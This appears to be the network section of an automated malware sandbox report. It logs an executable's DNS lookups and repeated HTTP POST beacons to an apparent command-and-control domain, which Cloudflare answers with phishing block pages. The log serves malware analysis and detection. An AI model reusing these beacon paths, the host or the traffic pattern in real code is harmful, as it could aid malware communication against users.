                                                                                                                                                    Jan 29, 2021 17:37:26.932027102 CET5379953192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:26.945055962 CET5468353192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:26.996061087 CET53537998.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:27.001338005 CET53546838.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:27.584101915 CET5932953192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:27.643075943 CET53593298.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:28.364412069 CET6402153192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:28.420788050 CET53640218.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:29.372565985 CET5612953192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:29.429075956 CET53561298.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:30.486442089 CET5817753192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:30.547898054 CET53581778.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:30.968092918 CET5070053192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:31.028464079 CET53507008.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:57.457674980 CET5406953192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:57.531764030 CET53540698.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:59.003036022 CET6117853192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:59.051980019 CET53611788.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:59.292176962 CET5701753192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:37:59.340296984 CET53570178.8.8.8192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:38:00.370244980 CET5632753192.168.2.68.8.8.8
                                                                                                                                                    Jan 29, 2021 17:38:00.426605940 CET53563278.8.8.8192.168.2.6

                                                                                                                                                    DNS Queries

                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                    Jan 29, 2021 17:36:38.183897018 CET192.168.2.68.8.8.80x4985Standard query (0)84cfba021a5a6662.xyzA (IP address)IN (0x0001)
                                                                                                                                                    Jan 29, 2021 17:36:46.307152033 CET192.168.2.68.8.8.80x9edcStandard query (0)84cfba021a5a6662.xyzA (IP address)IN (0x0001)
                                                                                                                                                    Jan 29, 2021 17:36:46.616519928 CET192.168.2.68.8.8.80xda23Standard query (0)84cfba021a5a6662.xyzA (IP address)IN (0x0001)
                                                                                                                                                    Jan 29, 2021 17:37:04.603930950 CET192.168.2.68.8.8.80xd253Standard query (0)84CFBA021A5A6662.xyzA (IP address)IN (0x0001)

                                                                                                                                                    DNS Answers

                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                    Jan 29, 2021 17:36:38.242616892 CET8.8.8.8192.168.2.60x4985No error (0)84cfba021a5a6662.xyz104.21.23.16A (IP address)IN (0x0001)
                                                                                                                                                    Jan 29, 2021 17:36:38.242616892 CET8.8.8.8192.168.2.60x4985No error (0)84cfba021a5a6662.xyz172.67.208.74A (IP address)IN (0x0001)
                                                                                                                                                    Jan 29, 2021 17:36:46.366413116 CET8.8.8.8192.168.2.60x9edcNo error (0)84cfba021a5a6662.xyz104.21.23.16A (IP address)IN (0x0001)
                                                                                                                                                    Jan 29, 2021 17:36:46.366413116 CET8.8.8.8192.168.2.60x9edcNo error (0)84cfba021a5a6662.xyz172.67.208.74A (IP address)IN (0x0001)
                                                                                                                                                    Jan 29, 2021 17:36:46.676454067 CET8.8.8.8192.168.2.60xda23No error (0)84cfba021a5a6662.xyz104.21.23.16A (IP address)IN (0x0001)
                                                                                                                                                    Jan 29, 2021 17:36:46.676454067 CET8.8.8.8192.168.2.60xda23No error (0)84cfba021a5a6662.xyz172.67.208.74A (IP address)IN (0x0001)
                                                                                                                                                    Jan 29, 2021 17:37:04.668473959 CET8.8.8.8192.168.2.60xd253No error (0)84CFBA021A5A6662.xyz104.21.23.16A (IP address)IN (0x0001)
                                                                                                                                                    Jan 29, 2021 17:37:04.668473959 CET8.8.8.8192.168.2.60xd253No error (0)84CFBA021A5A6662.xyz172.67.208.74A (IP address)IN (0x0001)

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • 84cfba021a5a6662.xyz

                                                                                                                                                    HTTP Packets

                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    0192.168.2.649725104.21.23.1680C:\Users\user\Desktop\Cyfj6XGbkd.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Jan 29, 2021 17:36:38.307451963 CET104OUTPOST //fine/send HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 82
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:38.379690886 CET105INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:38 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=df39acf80abb8bafc346aa9eed4bd05c41611938198; expires=Sun, 28-Feb-21 16:36:38 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a0b4900004c7a80bc4000000001
                                                                                                                                                    Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=J4ah8qzvvpxv%2BczEwA4ETXiFYM2G6PafyMoa%2BTIAPCky3zl9vDsHg%2B9on5W1BxDxKklki0N0iUmMs72VHFoCwLeoOUZPPRWogFvnfJ58%2B%2FtsA3BoUw%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945f8baafc4c7a-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="view
                                                                                                                                                    Jan 29, 2021 17:36:38.392950058 CET110OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:38.444030046 CET112INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:38 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=df39acf80abb8bafc346aa9eed4bd05c41611938198; expires=Sun, 28-Feb-21 16:36:38 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a0b9c00004c7abb17b000000001
                                                                                                                                                    Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=1TTxIsaBFLlODcFyVV2xP5OLGeOWNBxGyY%2B5l4VYhIX0LLTZs1rFGw%2BLFa2pD%2BFRCB35fr4x%2BzZQjEEecuGAh3F8lttgXT7%2B%2FWV5SUUhHIhsH3AJhg%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945f8c2c9d4c7a-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="vi
                                                                                                                                                    Jan 29, 2021 17:36:38.555047035 CET116OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:38.608758926 CET118INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:38 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=df39acf80abb8bafc346aa9eed4bd05c41611938198; expires=Sun, 28-Feb-21 16:36:38 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a0c3f00004c7a989ee000000001
                                                                                                                                                    Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=DNXVjPu5uwOmj99TlOOlAhMHoU%2F5YEqSEKFA8SUaJnYFWZXV0KUhm8zsKTx5eNn0ZKjJppKl8FGwSslOHQla1m%2BkGiweMsOpYugdajbxJfYjsXN%2FOg%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945f8d3fd04c7a-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport
                                                                                                                                                    Jan 29, 2021 17:36:40.871623993 CET149OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:40.932384968 CET150INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:40 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d62a03f41afb9e90cff91933b2a7bb33a1611938200; expires=Sun, 28-Feb-21 16:36:40 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a154f00004c7ae8157000000001
                                                                                                                                                    Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=cuqf45jSp%2Bm%2F3k0sv4SqMBJcKL7rdKkeo73x6od7TLqTgJ2Xnh4uuFmcj8wx7JbDVqLdNq%2Bs8VpaHSE7CEV5Yw8A77L2yb0UxxYccLy5T1q4VLIPgQ%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945f9bbcda4c7a-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    1192.168.2.649729104.21.23.1680C:\Users\user\Desktop\Cyfj6XGbkd.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Jan 29, 2021 17:36:46.603761911 CET168OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:46.695880890 CET170INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:46 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d24bdaf5c7addfa487e548b267849589e1611938206; expires=Sun, 28-Feb-21 16:36:46 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a2bb10000c7714b022000000001
                                                                                                                                                    Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=3WbUPNX0Q33l2fVJSYmLl0c0RPUwHvKFKwstASSbw4zStXrHdk7pR3qp9oXUJqZaHDIplqJGYjfYpfH3VAWB6bDXWgOVgqa6bDpzhIhib1vgGJngsw%3D%3D"}],"group":"cf-nel"}
                                                                                                                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                    Server: cloudflare
